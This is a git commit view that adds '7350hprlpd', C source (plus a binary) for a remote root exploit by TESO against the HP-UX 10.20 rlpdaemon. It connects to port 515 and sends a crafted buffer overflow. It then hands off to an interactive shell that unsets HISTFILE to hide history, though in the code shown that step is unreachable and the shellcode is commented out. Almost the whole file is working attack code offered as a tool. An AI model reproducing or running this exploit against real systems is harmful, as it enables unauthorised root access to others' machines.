summaryrefslogtreecommitdiff
path: root/exploits/7350hprlpd
diff options
context:
space:
mode:
authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /exploits/7350hprlpd
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'exploits/7350hprlpd')
-rw-r--r--exploits/7350hprlpd/7350hprlpdbin0 -> 30064 bytes
-rw-r--r--exploits/7350hprlpd/7350hprlpd.c345
2 files changed, 345 insertions, 0 deletions
diff --git a/exploits/7350hprlpd/7350hprlpd b/exploits/7350hprlpd/7350hprlpd
new file mode 100644
index 0000000..d2b3183
--- /dev/null
+++ b/exploits/7350hprlpd/7350hprlpd
Binary files differ
diff --git a/exploits/7350hprlpd/7350hprlpd.c b/exploits/7350hprlpd/7350hprlpd.c
new file mode 100644
index 0000000..be84754
--- /dev/null
+++ b/exploits/7350hprlpd/7350hprlpd.c
@@ -0,0 +1,345 @@
1/* 7350hprlpd - hppa/hpux rlpdaemon remote root exploit
2 *
3 * TESO CONFIDENTIAL - SOURCE MATERIALS
4 *
5 * This is unpublished proprietary source code of TESO Security.
6 *
7 * The contents of these coded instructions, statements and computer
8 * programs may not be disclosed to third parties, copied or duplicated in
9 * any form, in whole or in part, without the prior written permission of
10 * TESO Security. This includes especially the Bugtraq mailing list, the
11 * www.hack.co.za website and any public exploit archive.
12 *
13 * (C) COPYRIGHT TESO Security, 2001
14 * All Rights Reserved
15 *
16 *****************************************************************************
17 * bug published by ISS x-force 2001/08/27
18 *
19 *
20 */
21
22#define VERSION "0.0.1"
23
24#include <sys/types.h>
25#include <sys/time.h>
26#include <sys/socket.h>
27#include <netinet/in.h>
28#include <arpa/inet.h>
29#include <arpa/telnet.h>
30#include <netdb.h>
31#include <errno.h>
32#include <fcntl.h>
33#include <unistd.h>
34#include <stdio.h>
35#include <stdlib.h>
36#include <string.h>
37#include <time.h>
38
39
40void usage (char *progname);
41void xp (int fd);
42void shell (int sock);
43
44/* imported from network.c */
45#define NET_CONNTIMEOUT 60
46int net_conntimeout = NET_CONNTIMEOUT;
47
48
49unsigned long int net_resolve (char *host);
50int net_connect (struct sockaddr_in *cs, char *server,
51 unsigned short int port, int sec);
52
53
54typedef struct {
55 char * desc;
56
57 int bsize;
58 int align;
59
60 int ret_pos;
61 unsigned long int ret_addr;
62
63 unsigned long int code_addr;
64} t_elem;
65
66t_elem targets[] = {
67 { "HP-UX 10.20", 1100, 3, 100, 0x7b03bff8, 0x30303030 },
68 { NULL, 0, 0, 0, 0, 0 },
69};
70
71//unsigned char * shellcode = x86_bsd_compaexec;
72
73#define SHELL_INIT_STR "unset HISTFILE;uname -a;id;pwd;\n"
74
75
76void
77usage (char *progname)
78{
79 fprintf (stderr, "usage: %s <ip>\n\n", progname);
80 fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n"
81 "-c\tcheck exploitability only, do not exploit\n"
82 "-f\tforce mode, override check results\n\n");
83
84 exit (EXIT_FAILURE);
85}
86
87
88int
89main (int argc, char *argv[])
90{
91 int fd;
92 char c;
93 char * progname;
94 char * dest;
95
96
97 fprintf (stderr, "7350hprlpd - hppa/hpux rlpdaemon remote root\n"
98 "by scut.\n\n");
99
100 progname = argv[0];
101 if (argc < 2)
102 usage (progname);
103
104
105#if 0
106 while ((c = getopt (argc, argv, "n:cf")) != EOF) {
107 switch (c) {
108 case 'n':
109 num = atoi (optarg);
110 break;
111 case 'c':
112 checkonly = 1;
113 break;
114 case 'f':
115 force = 1;
116 break;
117 default:
118 usage (progname);
119 break;
120 }
121 }
122#endif
123
124 dest = argv[argc - 1];
125 if (dest[0] == '-')
126 usage (progname);
127
128 fd = net_connect (NULL, dest, 515, 20);
129 if (fd <= 0) {
130 fprintf (stderr, "failed to connect\n");
131 exit (EXIT_FAILURE);
132 }
133
134#ifdef DEBUG
135 getchar ();
136#endif
137 xp (fd);
138 sleep (15);
139/*XXX*/ exit (EXIT_SUCCESS);
140
141 printf ("## ok, you should now have a root shell\n");
142 printf ("##\n");
143
144 fflush (stdout);
145
146 write (fd, SHELL_INIT_STR, strlen (SHELL_INIT_STR));
147 shell (fd);
148
149 exit (EXIT_SUCCESS);
150}
151
152
153void
154xp (int fd)
155{
156 int n;
157 unsigned char buf[2048];
158
159
160 /* first request */
161 memset (buf, '\x00', sizeof (buf));
162
163 n = 0;
164 buf[n++] = '\6';
165 buf[n++] = '\n';
166 buf[n++] = '\0';
167
168 send (fd, buf, strlen (buf), 0);
169 sleep (1);
170
171
172 /* second request */
173 memset (buf, '\x00', sizeof (buf));
174
175 n = 0;
176 buf[n++] = '\6';
177
178 memset (&buf[n], 'A', 1051);
179 n += strlen (&buf[n]);
180
181 buf[n++] = '\x00';
182 buf[n++] = '\x00';
183 buf[n++] = '\x8c';
184 buf[n++] = '\xa3';
185
186 buf[n++] = '\xc0';
187 buf[n++] = '\x13';
188 buf[n++] = '\xd2';
189 buf[n++] = '\x03';
190
191 for ( ; n < 2000 ; ++n)
192 buf[n] = '0';
193
194 buf[n++] = '\n';
195 buf[n++] = '\0';
196
197 n = send (fd, buf, n, 0);
198}
199
200
201void
202shell (int sock)
203{
204 int l;
205 char buf[512];
206 fd_set rfds;
207
208
209 while (1) {
210 FD_SET (0, &rfds);
211 FD_SET (sock, &rfds);
212
213 select (sock + 1, &rfds, NULL, NULL, NULL);
214 if (FD_ISSET (0, &rfds)) {
215 l = read (0, buf, sizeof (buf));
216 if (l <= 0) {
217 perror ("read user");
218 exit (EXIT_FAILURE);
219 }
220 write (sock, buf, l);
221 }
222
223 if (FD_ISSET (sock, &rfds)) {
224 l = read (sock, buf, sizeof (buf));
225 if (l <= 0) {
226 perror ("read remote");
227 exit (EXIT_FAILURE);
228 }
229 write (1, buf, l);
230 }
231 }
232}
233
234
235unsigned long int
236net_resolve (char *host)
237{
238 long i;
239 struct hostent *he;
240
241 i = inet_addr(host);
242 if (i == -1) {
243 he = gethostbyname(host);
244 if (he == NULL) {
245 return (0);
246 } else {
247 return (*(unsigned long *) he->h_addr);
248 }
249 }
250 return (i);
251}
252
253
254int
255net_connect (struct sockaddr_in *cs, char *server,
256 unsigned short int port, int sec)
257{
258 int n,
259 len,
260 error,
261 flags;
262 int fd;
263 struct timeval tv;
264 fd_set rset, wset;
265 struct sockaddr_in csa;
266
267 if (cs == NULL)
268 cs = &csa;
269
270 /* first allocate a socket */
271 cs->sin_family = AF_INET;
272 cs->sin_port = htons (port);
273 fd = socket (cs->sin_family, SOCK_STREAM, 0);
274 if (fd == -1)
275 return (-1);
276
277 if (!(cs->sin_addr.s_addr = net_resolve (server))) {
278 close (fd);
279 return (-1);
280 }
281
282 flags = fcntl (fd, F_GETFL, 0);
283 if (flags == -1) {
284 close (fd);
285 return (-1);
286 }
287 n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
288 if (n == -1) {
289 close (fd);
290 return (-1);
291 }
292
293 error = 0;
294
295 n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
296 if (n < 0) {
297 if (errno != EINPROGRESS) {
298 close (fd);
299 return (-1);
300 }
301 }
302 if (n == 0)
303 goto done;
304
305 FD_ZERO(&rset);
306 FD_ZERO(&wset);
307 FD_SET(fd, &rset);
308 FD_SET(fd, &wset);
309 tv.tv_sec = sec;
310 tv.tv_usec = 0;
311
312 n = select(fd + 1, &rset, &wset, NULL, &tv);
313 if (n == 0) {
314 close(fd);
315 errno = ETIMEDOUT;
316 return (-1);
317 }
318 if (n == -1)
319 return (-1);
320
321 if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
322 if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
323 len = sizeof(error);
324 if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
325 errno = ETIMEDOUT;
326 return (-1);
327 }
328 if (error == 0) {
329 goto done;
330 } else {
331 errno = error;
332 return (-1);
333 }
334 }
335 } else
336 return (-1);
337
338done:
339 n = fcntl(fd, F_SETFL, flags);
340 if (n == -1)
341 return (-1);
342 return (fd);
343}
344
345